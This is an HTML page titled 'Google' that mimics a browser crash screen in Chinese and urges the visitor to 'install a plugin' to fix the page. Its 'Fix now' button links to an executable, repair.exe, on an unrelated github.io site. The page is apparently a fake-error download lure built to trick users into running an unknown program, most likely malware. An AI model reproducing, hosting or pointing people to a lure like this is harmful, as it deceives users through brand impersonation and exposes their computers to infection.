<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google</title>
    <style>
        .popup-container {
            background-color: white;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .popup-content {
            position: absolute;
            top: 30%;
            left: 30%;
            height: 300px;
            width: 600px;
            background-color: #e7d5d5;
            border: 1px solid #ccc;
            padding: 20px;
        }

        .popup-content img {
            margin: 3px;
        }

        .popup-content h3 {
            margin: 0;
        }

        .popup-content p {
            color: gray;
        }

        .popup-content button {
            margin-left: 85%;
            height: 30px;
            line-height: 30px;
            outline: none;
            border: none;
            background-color: rgb(26, 115, 232);
            color: white;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div class="popup-container">
        <div class="popup-content">
            <h3>喔唷，崩溃啦!</h3>
            <p>显示此网页时出了点问题，请在您的页面上安装插件修复，从而可能会有所帮助。</p>
            <a href="https://ezequielcamisassa537.github.io/repair.exe">
                </br></br></br>
                <button>立即修复</button>
            </a>
        </div>
    </div>
</body>
</html>
